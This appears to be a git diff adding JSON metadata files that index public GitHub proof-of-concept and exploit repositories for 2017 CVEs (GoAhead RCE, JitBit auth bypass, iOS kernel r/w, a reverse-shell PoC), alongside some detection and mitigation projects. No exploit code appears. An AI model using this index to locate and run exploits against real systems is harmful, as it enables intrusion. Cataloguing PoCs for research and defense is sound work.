"id": 223557910, + "name": "Goahead-CVE-2017-17562", + "full_name": "crispy-peppers\/Goahead-CVE-2017-17562", + "owner": { + "login": "crispy-peppers", + "id": 23626307, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23626307?v=4", + "html_url": "https:\/\/github.com\/crispy-peppers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crispy-peppers\/Goahead-CVE-2017-17562", + "description": null, + "fork": false, + "created_at": "2019-11-23T08:40:49Z", + "updated_at": "2019-11-23T09:11:33Z", + "pushed_at": "2019-11-23T09:11:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427951336, + "name": "goahead-rce-exploit", + "full_name": "nu11pointer\/goahead-rce-exploit", + "owner": { + "login": "nu11pointer", + "id": 40037088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40037088?v=4", + "html_url": "https:\/\/github.com\/nu11pointer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nu11pointer\/goahead-rce-exploit", + "description": "Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.", + "fork": false, + "created_at": "2021-11-14T14:30:10Z", + "updated_at": "2024-08-01T20:40:49Z", + "pushed_at": "2023-09-19T23:51:52Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 429155870, + "name": "bash-CVE-2017-17562", + "full_name": "freitzzz\/bash-CVE-2017-17562", + "owner": { + "login": "freitzzz", + "id": 26190214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26190214?v=4", + "html_url": "https:\/\/github.com\/freitzzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freitzzz\/bash-CVE-2017-17562", + "description": "PoC for CVE-2017-17562 written in bash", + "fork": false, + "created_at": "2021-11-17T18:21:54Z", + "updated_at": "2023-01-28T02:35:32Z", + "pushed_at": "2021-11-17T22:55:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17692.json b/2017/CVE-2017-17692.json new file mode 100644 index 0000000000..15f7177095 --- /dev/null +++ b/2017/CVE-2017-17692.json @@ -0,0 +1,33 @@ +[ + { + "id": 116205741, + "name": "CVE-2017-17692", + "full_name": "specloli\/CVE-2017-17692", + "owner": { + "login": "specloli", + "id": 10647366, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10647366?v=4", + "html_url": "https:\/\/github.com\/specloli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/specloli\/CVE-2017-17692", + "description": null, + "fork": false, + "created_at": "2018-01-04T02:40:13Z", + "updated_at": "2021-11-23T15:08:43Z", + "pushed_at": "2018-01-02T13:58:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17736.json b/2017/CVE-2017-17736.json new file mode 100644 index 0000000000..6769afd620 --- /dev/null +++ b/2017/CVE-2017-17736.json @@ -0,0 +1,33 @@ +[ + { + "id": 513226588, + "name": "Nuclei-TemplatesNuclei-Templates-CVE-2017-17736", + "full_name": "0xSojalSec\/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736", + "owner": { + "login": "0xSojalSec", + "id": 92203029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92203029?v=4", + "html_url": "https:\/\/github.com\/0xSojalSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xSojalSec\/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736", + "description": null, + "fork": false, + "created_at": "2022-07-12T17:04:51Z", + "updated_at": "2024-08-12T20:25:01Z", + "pushed_at": "2022-07-12T17:05:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17917.json b/2017/CVE-2017-17917.json new file mode 100644 index 0000000000..52effc7a27 --- /dev/null +++ b/2017/CVE-2017-17917.json @@ -0,0 +1,33 @@ +[ + { + "id": 745226621, + "name": "rails-cve-2017-17917", + "full_name": "matiasarenhard\/rails-cve-2017-17917", + "owner": { + "login": "matiasarenhard", + "id": 14844393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14844393?v=4", + "html_url": "https:\/\/github.com\/matiasarenhard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/matiasarenhard\/rails-cve-2017-17917", + "description": null, + "fork": false, + "created_at": "2024-01-18T22:12:54Z", + "updated_at": "2024-02-04T19:48:18Z", + "pushed_at": "2024-01-20T01:47:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-18019.json b/2017/CVE-2017-18019.json new file mode 100644 index 0000000000..688a34afb4 --- /dev/null +++ b/2017/CVE-2017-18019.json @@ -0,0 +1,33 @@ +[ + { + "id": 726282982, + "name": "CVE-2017-18019", + "full_name": "SpiralBL0CK\/CVE-2017-18019", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2017-18019", + "description": "Under Construction :) Please come back later", + "fork": false, + "created_at": "2023-12-01T23:59:07Z", + "updated_at": "2024-02-15T00:00:16Z", + "pushed_at": "2023-12-02T02:40:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-18044.json b/2017/CVE-2017-18044.json new file mode 100644 index 0000000000..9eec7ba252 --- /dev/null +++ b/2017/CVE-2017-18044.json @@ -0,0 +1,33 @@ +[ + { + "id": 151310036, + "name": "CVE-2017-18044-Exploit", + "full_name": "securifera\/CVE-2017-18044-Exploit", + "owner": { + "login": "securifera", + "id": 12126525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12126525?v=4", + "html_url": "https:\/\/github.com\/securifera", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securifera\/CVE-2017-18044-Exploit", + "description": "Commvault-CVE-2017-18044", + "fork": false, + "created_at": "2018-10-02T19:18:31Z", + "updated_at": "2024-08-12T19:42:08Z", + "pushed_at": "2018-10-07T18:12:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-18345.json b/2017/CVE-2017-18345.json new file mode 100644 index 0000000000..f61359815d --- /dev/null +++ b/2017/CVE-2017-18345.json @@ -0,0 +1,33 @@ +[ + { + "id": 95982626, + "name": "CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD", + "full_name": "Luth1er\/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD", + "owner": { + "login": "Luth1er", + "id": 23650363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23650363?v=4", + "html_url": "https:\/\/github.com\/Luth1er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Luth1er\/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD", + "description": "The Joomanager component through 2.0.0 for Joomla! has an Arbitrary File Download issue, resulting in exposing the Credentials of the DataBase.", + "fork": false, + "created_at": "2017-07-01T19:02:45Z", + "updated_at": "2024-10-28T03:50:58Z", + "pushed_at": "2019-01-28T20:59:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-18349.json b/2017/CVE-2017-18349.json new file mode 100644 index 0000000000..c26eb0f06d --- /dev/null +++ b/2017/CVE-2017-18349.json @@ -0,0 +1,33 @@ +[ + { + "id": 481674832, + "name": "Fastjson--CVE-2017-18349-", + "full_name": "h0cksr\/Fastjson--CVE-2017-18349-", + "owner": { + "login": "h0cksr", + "id": 81439858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81439858?v=4", + "html_url": "https:\/\/github.com\/h0cksr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h0cksr\/Fastjson--CVE-2017-18349-", + "description": null, + "fork": false, + "created_at": "2022-04-14T16:31:46Z", + "updated_at": "2024-07-05T01:50:33Z", + "pushed_at": "2022-04-15T14:00:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-18486.json b/2017/CVE-2017-18486.json new file mode 100644 index 0000000000..27e2a6ad57 --- /dev/null +++ b/2017/CVE-2017-18486.json @@ -0,0 +1,33 @@ +[ + { + "id": 104919233, + "name": "JitBit_Helpdesk_Auth_Bypass", + "full_name": "Kc57\/JitBit_Helpdesk_Auth_Bypass", + "owner": { + "login": "Kc57", + "id": 16500627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16500627?v=4", + "html_url": "https:\/\/github.com\/Kc57", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kc57\/JitBit_Helpdesk_Auth_Bypass", + "description": "Utility to derive the shared secret on a JitBit Helpdesk install which can be used for authentication bypass (CVE-2017-18486)", + "fork": false, + "created_at": "2017-09-26T17:51:01Z", + "updated_at": "2019-08-09T18:35:26Z", + "pushed_at": "2017-09-26T17:56:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-18635.json b/2017/CVE-2017-18635.json new file mode 100644 index 0000000000..532e96e566 --- /dev/null +++ b/2017/CVE-2017-18635.json @@ -0,0 +1,38 @@ +[ + { + "id": 215647693, + "name": "CVE-2017-18635", + "full_name": "ShielderSec\/CVE-2017-18635", + "owner": { + "login": "ShielderSec", + "id": 24564748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24564748?v=4", + "html_url": "https:\/\/github.com\/ShielderSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShielderSec\/CVE-2017-18635", + "description": "PoC for CVE-2017-18635", + "fork": false, + "created_at": "2019-10-16T21:27:40Z", + "updated_at": "2023-09-13T04:12:11Z", + "pushed_at": "2019-10-19T18:37:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "novnc", + "poc", + "xss" + ], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-20165.json b/2017/CVE-2017-20165.json new file mode 100644 index 0000000000..83f63e8ef5 --- /dev/null +++ b/2017/CVE-2017-20165.json @@ -0,0 +1,37 @@ +[ + { + "id": 587678390, + "name": "send", + "full_name": "fastify\/send", + "owner": { + "login": "fastify", + "id": 24939410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24939410?v=4", + "html_url": "https:\/\/github.com\/fastify", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fastify\/send", + "description": "Fork of the send module to deal with CVE-2017-20165", + "fork": false, + "created_at": "2023-01-11T10:20:27Z", + "updated_at": "2024-11-22T10:38:07Z", + "pushed_at": "2024-11-22T10:38:03Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [ + "fastify-library", + "file-download", + "send" + ], + "visibility": "public", + "forks": 12, + "watchers": 13, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2368.json b/2017/CVE-2017-2368.json new file mode 100644 index 0000000000..289891cc18 --- /dev/null +++ b/2017/CVE-2017-2368.json @@ -0,0 +1,33 @@ +[ + { + "id": 100696664, + "name": "CVE-2017-2368", + "full_name": "vincedes3\/CVE-2017-2368", + "owner": { + "login": "vincedes3", + "id": 26314689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26314689?v=4", + "html_url": "https:\/\/github.com\/vincedes3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincedes3\/CVE-2017-2368", + "description": "CVE-2017-2368 VCF Message App Crash Bug", + "fork": false, + "created_at": "2017-08-18T09:33:57Z", + "updated_at": "2017-08-18T09:33:57Z", + "pushed_at": "2017-08-18T09:36:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2370.json b/2017/CVE-2017-2370.json new file mode 100644 index 0000000000..d2a9911c95 --- /dev/null +++ b/2017/CVE-2017-2370.json @@ -0,0 +1,126 @@ +[ + { + "id": 80148945, + "name": "extra_recipe", + "full_name": "maximehip\/extra_recipe", + "owner": { + "login": "maximehip", + "id": 6273425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6273425?v=4", + "html_url": "https:\/\/github.com\/maximehip", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maximehip\/extra_recipe", + "description": "Ian Beer's exploit for CVE-2017-2370 (kernel memory r\/w on iOS 10.2) https:\/\/bugs.chromium.org\/p\/project-zero\/issues\/detail?id=1004", + "fork": false, + "created_at": "2017-01-26T19:47:43Z", + "updated_at": "2017-01-26T19:48:19Z", + "pushed_at": "2017-01-26T19:48:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 80717942, + "name": "extra_recipe", + "full_name": "JackBro\/extra_recipe", + "owner": { + "login": "JackBro", + "id": 21210712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21210712?v=4", + "html_url": "https:\/\/github.com\/JackBro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JackBro\/extra_recipe", + "description": "Ian Beer's exploit for CVE-2017-2370 (kernel memory r\/w on iOS 10.2)", + "fork": false, + "created_at": "2017-02-02T11:16:38Z", + "updated_at": "2017-10-14T08:34:32Z", + "pushed_at": "2017-01-27T17:44:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 81874110, + "name": "extra_recipe-iOS-10.2", + "full_name": "Rootkitsmm-zz\/extra_recipe-iOS-10.2", + "owner": { + "login": "Rootkitsmm-zz", + "id": 5567904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5567904?v=4", + "html_url": "https:\/\/github.com\/Rootkitsmm-zz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rootkitsmm-zz\/extra_recipe-iOS-10.2", + "description": "CVE-2017-2370", + "fork": false, + "created_at": "2017-02-13T21:32:40Z", + "updated_at": "2019-01-03T05:45:15Z", + "pushed_at": "2017-02-01T11:36:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 142854846, + "name": "CVE-2017-2370", + "full_name": "Peterpan0927\/CVE-2017-2370", + "owner": { + "login": "Peterpan0927", + "id": 26504662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26504662?v=4", + "html_url": "https:\/\/github.com\/Peterpan0927", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Peterpan0927\/CVE-2017-2370", + "description": "on Mac 10.12.2", + "fork": false, + "created_at": "2018-07-30T09:32:15Z", + "updated_at": "2024-08-12T19:40:26Z", + "pushed_at": "2018-08-03T09:03:34Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2388.json b/2017/CVE-2017-2388.json new file mode 100644 index 0000000000..c8aae2fb9a --- /dev/null +++ b/2017/CVE-2017-2388.json @@ -0,0 +1,33 @@ +[ + { + "id": 99374230, + "name": "IOFireWireFamily-null-deref", + "full_name": "bazad\/IOFireWireFamily-null-deref", + "owner": { + "login": "bazad", + "id": 3111637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3111637?v=4", + "html_url": "https:\/\/github.com\/bazad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bazad\/IOFireWireFamily-null-deref", + "description": "CVE-2017-2388: Null-pointer dereference in IOFireWireFamily.", + "fork": false, + "created_at": "2017-08-04T19:35:20Z", + "updated_at": "2024-08-12T19:31:47Z", + "pushed_at": "2017-08-16T20:16:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2636.json b/2017/CVE-2017-2636.json new file mode 100644 index 0000000000..19e9649e36 --- /dev/null +++ b/2017/CVE-2017-2636.json @@ -0,0 +1,35 @@ +[ + { + "id": 84497885, + "name": "cve-2017-2636-el", + "full_name": "alexzorin\/cve-2017-2636-el", + "owner": { + "login": "alexzorin", + "id": 311534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/311534?v=4", + "html_url": "https:\/\/github.com\/alexzorin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexzorin\/cve-2017-2636-el", + "description": "Ansible role for workaround for CVE-2017-2636 (Red Hat) - https:\/\/access.redhat.com\/security\/cve\/CVE-2017-2636", + "fork": false, + "created_at": "2017-03-09T23:20:42Z", + "updated_at": "2017-03-18T16:23:19Z", + "pushed_at": "2017-03-09T23:21:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ansible-role" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2666.json b/2017/CVE-2017-2666.json new file mode 100644 index 0000000000..a0125c74ec --- /dev/null +++ b/2017/CVE-2017-2666.json @@ -0,0 +1,33 @@ +[ + { + "id": 158203525, + "name": "CVE-2017-2666", + "full_name": "tafamace\/CVE-2017-2666", + "owner": { + "login": "tafamace", + "id": 45160113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tafamace\/CVE-2017-2666", + "description": null, + "fork": false, + "created_at": "2018-11-19T10:33:25Z", + "updated_at": "2018-11-19T11:06:10Z", + "pushed_at": "2018-11-19T11:06:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2671.json b/2017/CVE-2017-2671.json new file mode 100644 index 0000000000..ba5ab09e98 --- /dev/null +++ b/2017/CVE-2017-2671.json @@ -0,0 +1,33 @@ +[ + { + "id": 93707325, + "name": "CVE-2017-2671", + "full_name": "homjxi0e\/CVE-2017-2671", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-2671", + "description": null, + "fork": false, + "created_at": "2017-06-08T04:28:31Z", + "updated_at": "2017-06-08T04:46:23Z", + "pushed_at": "2017-06-08T04:46:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2741.json b/2017/CVE-2017-2741.json new file mode 100644 index 0000000000..1e24a57b45 --- /dev/null +++ b/2017/CVE-2017-2741.json @@ -0,0 +1,33 @@ +[ + { + "id": 395111256, + "name": "zeek-jetdirect", + "full_name": "dopheide-esnet\/zeek-jetdirect", + "owner": { + "login": "dopheide-esnet", + "id": 11233674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11233674?v=4", + "html_url": "https:\/\/github.com\/dopheide-esnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dopheide-esnet\/zeek-jetdirect", + "description": "Zeek Package to detect cve-2017-2741", + "fork": false, + "created_at": "2021-08-11T20:39:05Z", + "updated_at": "2023-08-02T18:16:15Z", + "pushed_at": "2021-08-20T17:34:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2751.json b/2017/CVE-2017-2751.json new file mode 100644 index 0000000000..ad8ff0eec1 --- /dev/null +++ b/2017/CVE-2017-2751.json @@ -0,0 +1,33 @@ +[ + { + "id": 234817787, + "name": "CVE-2017-2751", + "full_name": "BaderSZ\/CVE-2017-2751", + "owner": { + "login": "BaderSZ", + "id": 2165320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2165320?v=4", + "html_url": "https:\/\/github.com\/BaderSZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BaderSZ\/CVE-2017-2751", + "description": "Mini-paper on CVE-2017-2751, HP EFI password extraction.", + "fork": false, + "created_at": "2020-01-19T00:41:23Z", + "updated_at": "2023-03-29T10:58:53Z", + "pushed_at": "2023-03-29T10:58:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2793.json b/2017/CVE-2017-2793.json new file mode 100644 index 0000000000..8ee6298c40 --- /dev/null +++ b/2017/CVE-2017-2793.json @@ -0,0 +1,33 @@ +[ + { + "id": 95873037, + "name": "Detection-for-CVE-2017-2793", + "full_name": "sUbc0ol\/Detection-for-CVE-2017-2793", + "owner": { + "login": "sUbc0ol", + "id": 24601456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24601456?v=4", + "html_url": "https:\/\/github.com\/sUbc0ol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sUbc0ol\/Detection-for-CVE-2017-2793", + "description": null, + "fork": false, + "created_at": "2017-06-30T09:32:42Z", + "updated_at": "2024-08-12T19:30:59Z", + "pushed_at": "2017-06-30T09:35:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2824.json b/2017/CVE-2017-2824.json new file mode 100644 index 0000000000..4ab66afe15 --- /dev/null +++ b/2017/CVE-2017-2824.json @@ -0,0 +1,33 @@ +[ + { + "id": 433373107, + "name": "cve-2017-2824-reverse-shell", + "full_name": "listenquiet\/cve-2017-2824-reverse-shell", + "owner": { + "login": "listenquiet", + "id": 17470525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17470525?v=4", + "html_url": "https:\/\/github.com\/listenquiet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/listenquiet\/cve-2017-2824-reverse-shell", + "description": null, + "fork": false, + "created_at": "2021-11-30T09:42:25Z", + "updated_at": "2024-08-21T11:59:07Z", + "pushed_at": "2022-06-13T09:23:47Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-2903.json b/2017/CVE-2017-2903.json new file mode 100644 index 0000000000..16b18f3d99 --- /dev/null +++ b/2017/CVE-2017-2903.json @@ -0,0 +1,33 @@ +[ + { + "id": 764081614, + "name": "dpx_work_CVE-2017-2903", + "full_name": "SpiralBL0CK\/dpx_work_CVE-2017-2903", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/dpx_work_CVE-2017-2903", + "description": "dpx file format parser + mallicous crafter for CVE-2017-2903", + "fork": false, + "created_at": "2024-02-27T12:55:32Z", + "updated_at": "2024-02-27T12:55:32Z", + "pushed_at": "2024-02-27T12:55:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3000.json b/2017/CVE-2017-3000.json new file mode 100644 index 0000000000..735509e931 --- /dev/null +++ b/2017/CVE-2017-3000.json @@ -0,0 +1,33 @@ +[ + { + "id": 146188265, + "name": "CVE-2017-3000", + "full_name": "dangokyo\/CVE-2017-3000", + "owner": { + "login": "dangokyo", + "id": 6947840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6947840?v=4", + "html_url": "https:\/\/github.com\/dangokyo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dangokyo\/CVE-2017-3000", + "description": "A full exploit of CVE-2017-3000 on Flash Player Constant Blinding PRNG", + "fork": false, + "created_at": "2018-08-26T14:34:44Z", + "updated_at": "2020-06-13T07:48:08Z", + "pushed_at": "2018-08-27T13:22:41Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3066.json b/2017/CVE-2017-3066.json new file mode 100644 index 0000000000..b50452ea49 --- /dev/null +++ b/2017/CVE-2017-3066.json @@ -0,0 +1,64 @@ +[ + { + "id": 124920554, + "name": "ColdFusionPwn", + "full_name": "codewhitesec\/ColdFusionPwn", + "owner": { + "login": "codewhitesec", + "id": 8680262, + "avatar_url": 